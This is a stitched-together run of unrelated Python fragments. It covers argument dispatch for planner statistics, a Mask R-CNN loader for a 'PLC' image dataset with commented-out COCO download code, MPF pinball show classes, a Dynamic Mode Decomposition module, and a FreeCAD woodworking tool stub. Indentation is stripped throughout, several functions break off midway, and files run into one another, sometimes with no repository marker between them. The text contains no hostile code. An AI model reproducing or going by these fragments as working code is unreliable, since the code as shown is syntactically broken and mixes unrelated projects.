elif '-compareplanners' in myargs:
if 'all' == myargs['-compareplanners']:
all_counted_data, all_uncounted_data = fetch_all_data()
compare_planners(all_counted_data, all_uncounted_data)
else:
compare_planners(get_data(myargs['-compareplanners'], True), get_data(myargs['-compareplanners'], False))
elif '-maxsat' in myargs:
if 'all' == myargs['-maxsat']:
all_counted_data, all_uncounted_data = fetch_all_data()
maxsat_stats(all_uncounted_data[0])
else:
maxsat_stats(get_data(myargs['-maxsat'], False)[0])
elif '-mipvssat4j' in myargs:
if 'all' == myargs['-mipvssat4j']:
_, all_uncounted_data = fetch_all_data()
mip_vs_sat4j(all_uncounted_data[0], get_all_mip_data())
else:
mip_vs_sat4j(get_data(myargs['-mipvssat4j'], False)[0], get_mip_data(myargs['-mipvssat4j']))
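# Hedged usage sketch (the script name is assumed): typical invocations of the
# switches dispatched above, e.g.
#   python analyse.py -summary all
#   python analyse.py -lcpstats <domain>
#   python analyse.py -mipvssat4j all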
def load_mask(self, image_id):
    """Generate instance masks for an image.
Returns:
masks: A bool array of shape [height, width, instance count] with
one mask per instance.
class_ids: a 1D array of class IDs of the instance masks.
"""
# If not a PLC dataset image, delegate to parent class.
image_info = self.image_info[image_id]
if image_info["source"] != "PLC":
return super(self.__class__, self).load_mask(image_id)
name_id = image_info["class_id"]
print(name_id)
# Convert polygons to a bitmap mask of shape
# [height, width, instance_count]
info = self.image_info[image_id]
mask = np.zeros([info["height"], info["width"], len(info["polygons"])],
dtype=np.uint8)
class_ids = np.array(name_id, dtype=np.int32)
for i, p in enumerate(info["polygons"]):
# Get indexes of pixels inside the polygon and set them to 1
if 'all_points_y' in p.keys():
rr, cc = skimage.draw.polygon(p['all_points_y'], p['all_points_x'])
elif 'width' in p.keys():
    # rectangle annotation {x, y, width, height}: rows are the four y-corners,
    # columns are the four x-corners, listed in order around the rectangle
    rr, cc = skimage.draw.polygon(
        [p['y'], p['y'], p['y'] + p['height'], p['y'] + p['height']],
        [p['x'], p['x'] + p['width'], p['x'] + p['width'], p['x']])
mask[rr, cc, i] = 1
# print( mask.astype(np.bool), name_id)
# Return the mask and the array of class IDs for each instance.
return (mask.astype(np.bool), class_ids)
def image_reference(self, image_id):
"""Return the path of the image."""
info = self.image_info[image_id]
if info["source"] == "PLC":
return info["path"]
else:
super(self.__class__, self).image_reference(image_id)
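# Hedged illustration (standalone, values are made up): how the rectangle
# branch of load_mask above maps a {x, y, width, height} annotation to pixel
# indices. skimage.draw.polygon takes row (y) coordinates first, then column
# (x) coordinates, with corners listed in order around the shape.
def _rectangle_mask_demo():
    import numpy as np
    import skimage.draw
    p = {'x': 2, 'y': 1, 'width': 4, 'height': 3}
    rr, cc = skimage.draw.polygon(
        [p['y'], p['y'], p['y'] + p['height'], p['y'] + p['height']],
        [p['x'], p['x'] + p['width'], p['x'] + p['width'], p['x']])
    demo = np.zeros((6, 8), dtype=np.uint8)
    demo[rr, cc] = 1  # fills the rectangle anchored at row 1, col 2
    return demo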
def train(model):
"""Train the model."""
# Training dataset.
dataset_train = PLCDataset()
# dataset_train.load_PLC_AutoLable(args['dataset'], "json_train2")
# dataset_train.load_PLC_AutoLable(args['dataset'], "json_train_carplate")
dataset_train.load_PLC_AutoLable(args['dataset'], "")
dataset_train.prepare()
# Validation dataset
dataset_val = PLCDataset()
# dataset_val.load_PLC(args['dataset'], "json_val")
# dataset_val.load_PLC_AutoLable(args['dataset'], "json_train_carplate")
dataset_val.load_PLC_AutoLable(args['dataset'], "")
dataset_val.prepare()
# *** This training schedule is an example. Update to your needs ***
# Since we're using a very small dataset, and starting from
# COCO trained weights, we don't need to train too long. Note that,
# unlike the usual heads-only schedule, this call trains all layers.
print("Training all network layers")
model.train(dataset_train, dataset_val,
learning_rate=config.LEARNING_RATE,
epochs=1000,
layers='all')
#
# ############################################################
# # Dataset
# ############################################################
#
# class PLCDataset(utils.Dataset):
# def load_coco(self, dataset_dir, subset, year=DEFAULT_DATASET_YEAR, class_ids=None,
# class_map=None, return_coco=False, auto_download=False):
# """Load a subset of the COCO dataset.
# dataset_dir: The root directory of the COCO dataset.
# subset: What to load (train, val, minival, valminusminival)
# year: What dataset year to load (2014, 2017) as a string, not an integer
# class_ids: If provided, only loads images that have the given classes.
# class_map: TODO: Not implemented yet. Supports mapping classes from
# different datasets to the same class ID.
# return_coco: If True, returns the COCO object.
# auto_download: Automatically download and unzip MS-COCO images and annotations
# """
#
# if auto_download is True:
# self.auto_download(dataset_dir, subset, year)
#
# coco = COCO("{}/PLC_data/annotations/instances_{}.json".format(dataset_dir, subset))
# # coco = COCO(dataset_dir)
# if subset == "minival" or subset == "valminusminival":
# subset = "val"
# image_dir = "{}/{}".format(dataset_dir, subset)
#
# # Load all classes or a subset?
# if not class_ids:
# # All classes
# class_ids = sorted(coco.getCatIds())
#
# # All images or a subset?
# if class_ids:
# image_ids = []
# for id in class_ids:
# image_ids.extend(list(coco.getImgIds(catIds=[id])))
# # Remove duplicates
# image_ids = list(set(image_ids))
# else:
# # All images
# image_ids = list(coco.imgs.keys())
#
# # Add classes
# for i in class_ids:
# self.add_class("coco", i, coco.loadCats(i)[0]["name"])
#
# # Add images
# for i in image_ids:
# self.add_image(
# "coco", image_id=i,
# path=os.path.join(image_dir, coco.imgs[i]['file_name']),
# width=coco.imgs[i]["width"],
# height=coco.imgs[i]["height"],
# annotations=coco.loadAnns(coco.getAnnIds(
# imgIds=[i], catIds=class_ids, iscrowd=None)))
# if return_coco:
# return coco
#
# def auto_download(self, dataDir, dataType, dataYear):
# """Download the COCO dataset/annotations if requested.
# dataDir: The root directory of the COCO dataset.
# dataType: What to load (train, val, minival, valminusminival)
# dataYear: What dataset year to load (2014, 2017) as a string, not an integer
# Note:
# For 2014, use "train", "val", "minival", or "valminusminival"
# For 2017, only "train" and "val" annotations are available
# """
#
# # Setup paths and file names
# if dataType == "minival" or dataType == "valminusminival":
# imgDir = "{}/{}{}".format(dataDir, "val", dataYear)
# imgZipFile = "{}/{}{}.zip".format(dataDir, "val", dataYear)
# imgURL = "http://images.cocodataset.org/zips/{}{}.zip".format("val", dataYear)
# else:
# imgDir = "{}/{}{}".format(dataDir, dataType, dataYear)
# imgZipFile = "{}/{}{}.zip".format(dataDir, dataType, dataYear)
# imgURL = "http://images.cocodataset.org/zips/{}{}.zip".format(dataType, dataYear)
# # print("Image paths:"); print(imgDir); print(imgZipFile); print(imgURL)
#
# # Create main folder if it doesn't exist yet
# if not os.path.exists(dataDir):
# os.makedirs(dataDir)
#
# # Download images if not available locally
# if not os.path.exists(imgDir):
# os.makedirs(imgDir)
# print("Downloading images to " + imgZipFile + " ...")
# with urllib.request.urlopen(imgURL) as resp, open(imgZipFile, 'wb') as out:
# shutil.copyfileobj(resp, out)
# print("... done downloading.")
# print("Unzipping " + imgZipFile)
# with zipfile.ZipFile(imgZipFile, "r") as zip_ref:
# zip_ref.extractall(dataDir)
# print("... done unzipping")
# print("Will use images in " + imgDir)
#
# # Setup annotations data paths
# annDir = "{}/annotations".format(dataDir)
# if dataType == "minival":
# annZipFile = "{}/instances_minival2014.json.zip".format(dataDir)
# annFile = "{}/instances_minival2014.json".format(annDir)
# annURL = "https://dl.dropboxusercontent.com/s/o43o90bna78omob/instances_minival2014.json.zip?dl=0"
# unZipDir = annDir
# elif dataType == "valminusminival":
# annZipFile = "{}/instances_valminusminival2014.json.zip".format(dataDir)
# annFile = "{}/instances_valminusminival2014.json".format(annDir)
# annURL = "https://dl.dropboxusercontent.com/s/s3tw5zcg7395368/instances_valminusminival2014.json.zip?dl=0"
# unZipDir = annDir
# else:
# annZipFile = "{}/annotations_trainval{}.zip".format(dataDir, dataYear)
# annFile = "{}/instances_{}{}.json".format(annDir, dataType, dataYear)
# annURL = "http://images.cocodataset.org/annotations/annotations_trainval{}.zip".format(dataYear)
# unZipDir = dataDir
# # print("Annotations paths:"); print(annDir); print(annFile); print(annZipFile); print(annURL)
#
# # Download annotations if not available locally
# if not os.path.exists(annDir):
# os.makedirs(annDir)
# if not os.path.exists(annFile):
# if not os.path.exists(annZipFile):
# print("Downloading zipped annotations to " + annZipFile + " ...")
# with urllib.request.urlopen(annURL) as resp, open(annZipFile, 'wb') as out:
# shutil.copyfileobj(resp, out)
# print("... done downloading.")
# print("Unzipping " + annZipFile)
# with zipfile.ZipFile(annZipFile, "r") as zip_ref:
# zip_ref.extractall(unZipDir)
# print("... done unzipping")
# print("Will use annotations in " + annFile)
#
# def load_mask(self, image_id):
# """Load instance masks for the given image.
#
# Different datasets use different ways to store masks. This
# function converts the different mask format to one format
# in the form of a bitmap [height, width, instances].
#
# Returns:
# masks: A bool array of shape [height, width, instance count] with
# one mask per instance.
# class_ids: a 1D array of class IDs of the instance masks.
# """
# # If not a COCO image, delegate to parent class.
# image_info = self.image_info[image_id]
# if image_info["source"] != "coco":
# return super(CocoDataset, self).load_mask(image_id)
#
# instance_masks = []
# class_ids = []
# annotations = self.image_info[image_id]["annotations"]
# # Build mask of shape [height, width, instance_count] and list
# # of class IDs that correspond to each channel of the mask.
# for annotation in annotations:
# class_id = self.map_source_class_id(
# "coco.{}".format(annotation['category_id']))
# if class_id:
# m = self.annToMask(annotation, image_info["height"],
# image_info["width"])
# # Some objects are so small that they're less than 1 pixel area
# # and end up rounded out. Skip those objects.
# if m.max() < 1:
# continue
# # Is it a crowd? If so, use a negative class ID.
# if annotation['iscrowd']:
# # Use negative class ID for crowds
# class_id *= -1
# # For crowd masks, annToMask() sometimes returns a mask
# # smaller than the given dimensions. If so, resize it.
# if m.shape[0] != image_info["height"] or m.shape[1] != image_info["width"]:
# m = np.ones([image_info["height"], image_info["width"]], dtype=bool)
# instance_masks.append(m)
# class_ids.append(class_id)
#
# # Pack instance masks into an array
# if class_ids:
# mask = np.stack(instance_masks, axis=2).astype(np.bool)
# class_ids = np.array(class_ids, dtype=np.int32)
# return mask, class_ids
# else:
# # Call super class to return an empty mask
# return super(CocoDataset, self).load_mask(image_id)
#
# def image_reference(self, image_id):
# """Return a link to the image in the COCO Website."""
# info = self.image_info[image_id]
# if info["source"] == "coco":
# return "http://cocodataset.org/#explore?id={}".format(info["id"])
# else:
# super(CocoDataset, self).image_reference(image_id)
#
# # The following two functions are from pycocotools with a few changes.
#
# def annToRLE(self, ann, height, width):
# """
# Convert annotation which can be polygons, uncompressed RLE to RLE.
# :return: binary mask (numpy 2D array)
# """
# segm = ann['segmentation']
# if isinstance(segm, list):
# # polygon -- a single object might consist of multiple parts
# # we merge all parts into one mask rle code
# rles = maskUtils.frPyObjects(segm, height, width)
# rle = maskUtils.merge(rles)
# elif isinstance(segm['counts'], list):
# # uncompressed RLE
# rle = maskUtils.frPyObjects(segm, height, width)
# else:
# # rle
# rle = ann['segmentation']
# return rle
#
# def annToMask(self, ann, height, width):
# """
# Convert annotation which can be polygons, uncompressed RLE, or RLE to binary mask.
# :return: binary mask (numpy 2D array)
# """
# rle = self.annToRLE(ann, height, width)
# m = maskUtils.decode(rle)
# return m
############################################################
# COCO Evaluation
############################################################
def build_coco_results(dataset, image_ids, rois, class_ids, scores, masks):
"""Arrange resutls to match COCO specs in http://cocodataset.org/#format
"""
# If no results, return an empty list
if rois is None:
return []
results = []
for image_id in image_ids:
# Loop through detections
for i in range(rois.shape[0]):
class_id = class_ids[i]
score = scores[i]
bbox = np.around(rois[i], 1)
mask = masks[:, :, i]
result = {
"image_id": image_id,
"category_id": dataset.get_source_class_id(class_id, "coco"),
"bbox": [bbox[1], bbox[0], bbox[3] - bbox[1], bbox[2] - bbox[0]],
"score": score,
"segmentation": maskUtils.encode(np.asfortranarray(mask))
}
results.append(result)
return results
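# Hedged illustration (values are made up): the bbox conversion performed in
# build_coco_results above, from Mask R-CNN's [y1, x1, y2, x2] layout to
# COCO's [x, y, width, height] layout.
def _bbox_conversion_demo():
    roi = [10.0, 20.0, 50.0, 80.0]  # y1, x1, y2, x2
    coco_bbox = [roi[1], roi[0], roi[3] - roi[1], roi[2] - roi[0]]
    assert coco_bbox == [20.0, 10.0, 60.0, 40.0]  # x, y, width, height
    return coco_bbox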
pannel_index = 0
total_count = 1
pcl_container = []
import math
# Note: non-maximum suppression is used here; to be removed later
all_labels = ["SM 1234", "SM 1231", "SM 1223"]
def display_mask_image(cv_window_name,image, boxes, masks, class_ids, class_names,
scores=None, title="PLC",
figsize=(16, 16), ax=None,
show_mask=True, show_bbox=True,
colors=None, captions=None,
score_threshold=0.8,show_score=True,Traceing_threshold=150):
"""
boxes: [num_instance, (y1, x1, y2, x2, class_id)] in image coordinates.
"""
# Repository: haggispinball/mpf_fathom_fast
"""Contains show related classes."""
import re
from collections import namedtuple
from typing import List, Dict, Any, Optional
from mpf.core.assets import AssetPool
from mpf.core.config_validator import RuntimeToken
from mpf.core.utility_functions import Util
from mpf.exceptions.config_file_error import ConfigFileError
MYPY = False
if MYPY: # pragma: no cover
from typing import NoReturn # pylint: disable-msg=cyclic-import,unused-import
__api__ = ['Show', 'RunningShow', 'ShowPool']
ShowConfig = namedtuple("ShowConfig", ["name", "priority", "speed", "loops", "sync_ms", "manual_advance", "show_tokens",
"events_when_played", "events_when_stopped", "events_when_looped",
"events_when_paused", "events_when_resumed", "events_when_advanced",
"events_when_stepped_back", "events_when_updated", "events_when_completed"])
class ShowPool(AssetPool):
"""A pool of shows."""
__slots__ = [] # type: List[str]
def __repr__(self):
"""Return str representation."""
return '<ShowPool: {}>'.format(self.name)
# pylint: disable-msg=too-many-arguments
def play_with_config(self, show_config: ShowConfig, start_time=None, start_running=True, start_callback=None,
stop_callback=None, start_step=None) -> "RunningShow":
"""Play asset from pool with config."""
return self.asset.play_with_config(show_config, start_time, start_running, start_callback, stop_callback,
start_step)
# pylint: disable-msg=too-many-arguments
# pylint: disable-msg=too-many-locals
def play(self, priority=0, speed=1.0, start_step=1, callback=None,
loops=-1, sync_ms=None, manual_advance=False, show_tokens=None,
events_when_played=None, events_when_stopped=None,
events_when_looped=None, events_when_paused=None,
events_when_resumed=None, events_when_advanced=None,
events_when_stepped_back=None, events_when_updated=None,
events_when_completed=None, start_time=None, start_callback=None) -> "RunningShow":
"""Play asset from pool."""
return self.asset.play(priority, speed, start_step, callback,
loops, sync_ms, manual_advance, show_tokens,
events_when_played, events_when_stopped,
events_when_looped, events_when_paused,
events_when_resumed, events_when_advanced,
events_when_stepped_back, events_when_updated,
events_when_completed, start_time, start_callback)
# pylint: disable-msg=too-many-instance-attributes
class Show:
"""A show which can be instantiated."""
attribute = 'shows'
path_string = 'shows'
config_section = 'shows'
disk_asset_section = 'file_shows'
extensions = ('yaml',)
class_priority = 100
pool_config_section = 'show_pools'
asset_group_class = ShowPool
__slots__ = ["_autoplay_settings", "tokens", "token_values", "token_keys", "name", "total_steps", "show_steps",
"_step_cache", "machine"]
def __init__(self, machine, name):
"""Initialise show."""
self.machine = machine
self._autoplay_settings = dict()
self.tokens = set()
self.token_values = dict()
self.token_keys = dict()
self.name = name
self.total_steps = None
self.show_steps = [] # type: List[Dict[str, Any]]
self._step_cache = {}
def __lt__(self, other):
"""Compare two instances."""
return id(self) < id(other)
def _get_duration(self, data, step_num, total_step_time):
total_steps_num = len(data)
step = data[step_num]
if 'duration' not in step:
if step_num == total_steps_num - 1:
# special case with an empty last step (but longer than 1 step)
if 'time' in step and len(step) == 1 and step_num != 0:
return False
return 1
if 'time' in data[step_num + 1]:
next_step_time = data[step_num + 1]['time']
if str(next_step_time)[0] == "+":
return Util.string_to_secs(next_step_time)
if total_step_time < 0: # pragma: no cover
self._show_validation_error("Absolute timing in step {} not possible because "
"there was a duration of -1 before".format(step_num), 5)
return Util.string_to_secs(next_step_time) - total_step_time
return 1
if step_num < total_steps_num - 1 and 'time' in data[step_num + 1]: # pragma: no cover
self._show_validation_error("Found invalid 'time' entry in step after {} which contains a duration. "
"Remove either of them!".format(step_num), 2)
return Util.string_to_secs(step['duration'])
def load(self, data: Optional[Dict]):
"""Load show configuration."""
self.show_steps = list()
if not isinstance(data, list): # pragma: no cover
self._show_validation_error("Show {} does not appear to be a valid show "
"config. It should be a list of steps. Did you forget the hyphen at the start "
"of your step?".format(self.name), 1)
if not data: # pragma: no cover
self._show_validation_error("Cannot load empty show", 6)
total_step_time = 0
# add empty first step if show does not start right away
if 'time' in data[0] and data[0]['time'] != 0:
self.show_steps.append({'duration': Util.string_to_secs(data[0]['time'])})
total_step_time = Util.string_to_secs(data[0]['time'])
# Loop over all steps in the show file
for step_num, step in enumerate(data):
actions = dict()
# Note: all times are stored/calculated in seconds.
# Step time can be specified as either an absolute time elapsed
# (from the beginning of the show) or a relative time (time elapsed
# since the previous step). Time strings starting with a plus sign
# (+) are treated as relative times.
# Step times are all converted to relative times internally (time
# since the previous step).
# Make sure there is a time entry for each step in the show file.
duration = self._get_duration(data, step_num, total_step_time)
# special case: empty last step
if duration is False:
break
if duration == 0: # pragma: no cover
self._show_validation_error("Step {} has 0 duration".format(step_num), 7)
# Calculate the time since previous step
actions['duration'] = duration
if duration > 0 and total_step_time >= 0:
total_step_time += duration
else:
total_step_time = -1
# Now process show step actions
self._process_step_actions(step, actions)
self.show_steps.append(actions)
# Count how many total steps are in the show. We need this later
# so we can know when we're at the end of a show
self.total_steps = len(self.show_steps)
if self.total_steps == 0: # pragma: no cover
self._show_validation_error('Show "{}" is empty', 2)
self._get_tokens()
def _show_validation_error(self, msg, error_code) -> "NoReturn": # pragma: no cover
raise ConfigFileError('"{}" >> {}'.format(self.name, msg), error_code, "show", self.name)
def _process_step_actions(self, step, actions):
if not isinstance(step, dict):
raise AssertionError('Steps in show "{}" need to be dicts.'.format(self.name))
for key, value in step.items():
# key: the section of the show, like 'leds'
# value: dict of express settings or dict of dicts w full settings
# check to see if we know how to process this kind of entry
if key in self.machine.show_controller.show_players.keys():
try:
actions[key] = \
self.machine.show_controller.show_players[key].validate_config_entry(value, self.name)
# If something in the show triggered a config error, bubble it up to preserve logger and context
except ConfigFileError as e:
e.extend('Show "{}"'.format(self.name))
raise e
elif key not in ('duration', 'time'): # pragma: no cover
for player in self.machine.show_controller.show_players.values():
if key == player.config_file_section or key == player.machine_collection_name or \
key + "s" == player.show_section:
self._show_validation_error(
'Invalid section "{}:" found. Did you mean "{}:" instead?'.format(
key, player.show_section), 3)
self._show_validation_error('Invalid section "{}:" found.'.format(key), 4)
def _get_tokens(self):
self._walk_show(self.show_steps)
def _walk_show(self, data, path=None, list_index=None):
# walks a list of dicts, checking tokens
if not path:
path = list()
if isinstance(data, dict):
for k, v in data.items():
self._check_token(path, k, 'key')
self._walk_show(v, path + [k])
elif isinstance(data, list):
for i in data:
self._check_token(path, i, 'key')
if list_index is None:
list_index = 0
else:
list_index += 1
self._walk_show(i, path + [list_index], list_index)
else:
self._check_token(path, data, 'value')
@classmethod
def _copy_recursive(cls, data):
if isinstance(data, dict):
new_dict = dict()
for k, v in data.items():
new_dict[k] = cls._copy_recursive(v)
return new_dict
if isinstance(data, list):
new_list = list()
for i in data:
new_list.append(cls._copy_recursive(i))
return new_list
return data
def get_show_steps(self):
"""Return a copy of the show steps."""
copied_steps = []
for step in self.show_steps:
copied_steps.append(self._copy_recursive(step))
return copied_steps
def _check_token(self, path, data, token_type):
if isinstance(data, RuntimeToken):
self._add_token(data, data.token, path, token_type)
return
if not isinstance(data, str):
return
results = re.findall(r"\(([^)]+)\)", data)
if results:
for result in results:
self._add_token(data, result, path, token_type)
def _add_token(self, placeholder, token, path, token_type):
if token not in self.tokens:
self.tokens.add(token)
if token_type == 'key':
if token not in self.token_keys:
self.token_keys[token] = list()
self.token_keys[token].append(path + [placeholder])
elif token_type == 'value':
if token not in self.token_values:
self.token_values[token] = list()
self.token_values[token].append(path)
# pylint: disable-msg=too-many-arguments
def play_with_config(self, show_config: ShowConfig, start_time=None, start_running=True,
start_callback=None, stop_callback=None, start_step=None) -> "RunningShow":
"""Play this show with config."""
if not start_time:
start_time = self.machine.clock.get_time()
running_show = RunningShow(machine=self.machine,
show=self,
start_time=start_time,
start_step=int(start_step),
start_running=start_running,
callback=stop_callback,
start_callback=start_callback,
show_config=show_config)
return running_show
# pylint: disable-msg=too-many-arguments
# pylint: disable-msg=too-many-locals
def play(self, priority=0, speed=1.0, start_step=1, callback=None,
loops=-1, sync_ms=None, manual_advance=False, show_tokens=None,
events_when_played=None, events_when_stopped=None,
events_when_looped=None, events_when_paused=None,
events_when_resumed=None, events_when_advanced=None,
events_when_stepped_back=None, events_when_updated=None,
events_when_completed=None, start_time=None, start_callback=None,
start_running=True) -> "RunningShow":
"""Play a Show.
There are many parameters you can use here which
affect how the show is played. This includes things like the playback
speed, priority, etc. These are
all set when the show plays. (For example, you could have a Show
file which lights a bunch of lights sequentially in a circle pattern,
but you can have that circle "spin" as fast as you want depending on
how you play the show.)
Args:
----
priority: Integer value of the relative priority of this show. If
there's ever a situation where multiple shows want to control
the same item, the one with the higher priority will win.
("Higher" means a bigger number, so a show with priority 2 will
override a priority 1.)
speed: Float of how fast your show runs. Your Show files
specify step times in actual time values. When you play a
show,
you specify a playback rate factor that is applied to the time
values in the show (divides the relative show times). The
default value is 1.0 (uses the actual time values in the show).
"""
# Repository: dowlinglab/dmd-energy-markets
import numpy as np
from scipy import linalg as la
from cmath import exp
import matplotlib.pyplot as plt
def split(Xf, verbose=False):
'''
This function performs a crucial manipulation for DMD:
the splitting of a spatial-temporal matrix (Xf) into
two matrices (X and Xp). The X matrix is the time series for
1 to n-1 and Xp is the time series of 2 to n where n is the
number of time intervals (columns of the original Xf).
input:
Xf - matrix of full spatial-temporal data
output:
X - matrix for times 1 to n-1
Xp - matrix for times 2 to n
options:
verbose - boolean for visualization of splitting
'''
if verbose:
print('Entering the matrix splitting function:')
if verbose:
print('Xf =\n', Xf, '\n')
X = Xf[:, :-1]
Xp = Xf[:, 1:]
if verbose:
print('X =\n', X, '\n')
print('Xp =\n', Xp, '\n')
return X, Xp
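# Hedged usage sketch (illustrative values): splitting a 2x4 snapshot matrix
# into the time-shifted pair that DMD operates on.
def _split_demo():
    Xf = np.array([[1., 2., 3., 4.],
                   [0., 1., 0., 1.]])
    X, Xp = split(Xf)
    # X holds columns 0..2 of Xf; Xp holds columns 1..3
    return X, Xp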
class DMD:
'''
This class contains the functions needed for performing a full DMD
on any given matrix. Depending on functions being used, different
outputs can be achieved.
This class also contains functions useful to the analysis of DMD
results and intermediates.
'''
@staticmethod
def decomp(Xf, time, verbose=False, rank_cut=True, esp=1e-2, svd_cut=False,
num_svd=1, do_SVD=True, given_svd=False):
'''
This function performs the basic DMD on a given matrix A.
The general outline of the algorithm is as follows...
1) Break up the input X matrix into time series for 1 to n-1 (X)
and 2 to n (X) where n is the number of time intervals (X_p)
(columns). This uses the manipulate class's function "split".
2) Compute the Singular Value Decomposition of X. X = (U)(S)(Vh)
3) Compute the A_t matrix. This is related to the A matrix which
gives A = X * Xp. However, the At matrix has been projected
onto the POD modes of X. Therefore At = U'*A*U. (' detonates
a matrix transpose)
4) Compute the eigen decomposition of the At matrix. At*W=W*L
5) Compute the DMD modes of A by SVD reconstruction. Finally, the
DMD modes are given by the columns of Phi.
Phi = (Xp)(V)(S^-1)(W)
6) Compute the discrete and continuous time eigenvalues
lam (discrete) is the diagonal matrix of eigenvalues of At.
omg (continuous) = ln(lam)/dt
7) Compute the amplitude of each DMD mode (b). This is a vector
which applies to this system: Phi(b)=X_1 Where X_1 is the first
column of the input vector X. This requires a linear equation
solver via scipy.
8) Reconstruct the matrix X from the DMD modes (Xdmd).
inputs:
* Xf - (mxn) spatial-temporal matrix
* time - (nx1) Time vector
outputs:
1. Phi - DMD modes
2. omg - continuous time eigenvalues
3. lam - discrete time eigenvalues
4. b - amplitudes of DMD modes
5. Xdmd - reconstructed X matrix from DMD modes
6. rank - the rank used in calculations
** all contained in a class see ### (10) ### below **
options:
* verbose - boolean for more information
* svd_cut - boolean for truncation of SVD values of X
* esp - value to truncate singular values lower than
* rank_cut - truncate the SVD of X to the rank of X
* num_svd - number of singular values to use
* do_SVD - tells the program if the svd is provided to it or not
'''
if verbose:
print('Entering Dynamic Mode Decomposition:\n')
# --- (1) --- #
# split the Xf matrix
X, Xp = split(Xf)
if verbose:
print('X = \n', X, '\n')
print('X` = \n', Xp, '\n')
### (2) ### # noqa:
# perform a singular value decomposition on X
if do_SVD:
    if verbose:
        print('Performing singular value decomposition...\n')
    U, S, Vh = la.svd(X)
else:
    if verbose:
        print('Singular value decomposition provided...\n')
U, S, Vh = given_svd
if verbose:
print('Singular value decomposition:')
print('U: \n', U)
print('S: \n', S)
print('Vh: \n', Vh)
print('Reconstruction:')
S_m = np.zeros(np.shape(X))
for i in range(len(list(S))):
S_m[i, i] = S[i]
recon = np.dot(np.dot(U, S_m), Vh)
print('X =\n', recon)
# perform desired truncations of X
if svd_cut:
rank_cut = False
if rank_cut: # this is the default truncation
rank = 0
for i in S:
if i > esp:
rank += 1
if verbose:
print('Singular Values of X:', '\n', S, '\n')
print('Reducing Rank of System...\n')
Ur = U[:, 0:rank]
Sr = S[0:rank]
Vhr = Vh[0:rank, :]
if verbose:
recon = np.dot(np.dot(Ur, np.diag(Sr)), Vhr)
print('Rank Reduced reconstruction:\n', 'X =\n', recon)
elif svd_cut:
rank = num_svd
if verbose:
print('Singular Values of X:', '\n', S, '\n')
print('Reducing Rank of System to n =', num_svd, '...\n')
Ur = U[:, 0:rank]
Sr = S[0:rank]
Vhr = Vh[0:rank, :]
if verbose:
recon = np.dot(np.dot(Ur, np.diag(Sr)), Vhr)
print('Rank Reduced reconstruction:\n', 'X =\n', recon)
# return the condition number to view singularity
condition = max(Sr) / min(Sr)
smallest_svd = min(Sr)
svd_used = np.size(Sr)
if verbose:
condition = max(Sr) / min(Sr)
print('Condition of Rank Converted Matrix X:', '\nK =', condition, '\n')
# make the singular values a matrix and take the inverse
Sr_inv = np.diag([i ** -1 for i in Sr])
Sr = np.diag(Sr)
### (3) ### # noqa:
# now compute the A_t matrix
Vr = Vhr.conj().T
At = Ur.conj().T.dot(Xp)
At = At.dot(Vr)
At = At.dot(la.inv(Sr))
if verbose:
print('A~ = \n', At, '\n')
### (4) ### # noqa:
# perform the eigen decomposition of At
L, W = la.eig(At)
# also determine the number of positive eigenvalues
pos_eigs = np.count_nonzero(L.real > 0)  # eigenvalues with positive real part
### (5) ### # noqa:
# compute the DMD modes
# phi = Xp @ Vhr.conj().T @ Sr_inv @ W
phi = np.dot(Xp, Vhr.conj().T)
phi = np.dot(phi, Sr_inv)
phi = np.dot(phi, W)
if verbose:
print('DMD Mode Matrix:', '\nPhi =\n', phi, '\n')
### (6) ### # noqa:
# compute the continuous and discrete eigenvalues
dt = time[1] - time[0]
lam = L
omg = np.log(lam) / dt
if verbose:
print('Discrete time eigenvalues:\n', 'Lambda =', L, '\n')
print('Continuous time eigenvalues:\n', 'Omega =', np.log(L) / dt, '\n')
print('Number of positive eigenvalues: ', pos_eigs, '\n')
### (7) ### # noqa:
# compute the amplitude vector b by solving the linear system described.
# note that a least-squares solver has to be used in order to approximate
# the solution to the overdetermined problem
x1 = X[:, 0]
b = la.lstsq(phi, x1)
b = b[0]
if verbose:
print('b =\n', b, '\n')
### (8) ### # noqa:
# finally reconstruct the data matrix from the DMD modes
length = np.size(time) # number of time measurements
# initialize the time dynamics
dynamics = np.zeros((rank, length), dtype=np.complex_)
for t in range(length):
omg_p = np.array([exp(i * time[t]) for i in omg])
dynamics[:, t] = b * omg_p
if verbose:
print('Time dynamics:\n', dynamics, '\n')
# reconstruct the data
Xdmd = np.dot(phi, dynamics)
if verbose:
print('Reconstruction:\n', np.real(Xdmd), '\n')
print('Original:\n', np.real(Xf), '\n')
### (9) ### # noqa:
# calculate some residual value
res = np.real(Xf - Xdmd)
error = la.norm(res) / la.norm(Xf)
if verbose:
print('Reconstruction Error:', round(error * 100, 2), '%')
### (10) ### # noqa:
# returns a class with all of the results
class results():
def __init__(self):
self.phi = phi
self.omg = omg
self.lam = lam
self.b = b
self.Xdmd = Xdmd
self.error = error * 100
self.rank = rank
self.svd_used = svd_used
self.condition = condition
self.smallest_svd = smallest_svd
self.pos_eigs = pos_eigs
self.dynamics = dynamics
return results()
@staticmethod
def predict(dmd_model, t):
'''
This function will take a DMD decomposition output
result and a desired time incremint prediction and
produce a prediction of the system at the given time.
inputs:
* dmd_model - class that comes from the function "decomp"
* t - future time for prediction
outputs:
* x - prediction vector (real part only)
'''
# finally reconstruct the data matrix from the DMD modes
dynamics = np.zeros((dmd_model.rank, 1), dtype=np.complex_)
omg_p = np.array([exp(i * t) for i in dmd_model.omg])
dynamics[:, 0] = dmd_model.b * omg_p
# the prediction is the real part of Phi @ dynamics
x = np.real(np.dot(dmd_model.phi, dynamics))
return x
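# Hedged end-to-end sketch (toy data, not from the original project): run
# decomp on a two-mode oscillatory signal and predict one step past the
# sampled window. svd_cut/num_svd force a rank-2 truncation.
def _dmd_demo():
    t = np.linspace(0.0, 1.0, 21)
    Xf = np.vstack([np.cos(2 * np.pi * t), np.sin(2 * np.pi * t)])
    model = DMD.decomp(Xf, t, svd_cut=True, num_svd=2)
    return DMD.predict(model, t[-1] + (t[1] - t[0]))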
# Repository: dprojects/Woodworking
# This file has been automatically generated by the loadToolsAuto.py script. Don't change it here.
import FreeCADGui
import os, sys
import fakemodule
path = os.path.dirname(fakemodule.__file__)
iconPath = os.path.join(path, "Icons")
# ######################################################################################################################
class getDimensions():
def GetResources(self):
return {"Pixmap" : os.path.join(iconPath, "getDimensions.xpm"),
"Accel" : "",
"MenuText": "getDimensions, BOM, cutlist",
"ToolTip" : "Creates spreadsheet with dimensions to cut."}
def Activated(self):
import os, sys
import fakemodule
modulePath = sys.path
module = "getDimensions"
path = os.path.dirname(fakemodule.__file__)
path = os.path.join(path, "Tools")
sys.path.append(path)
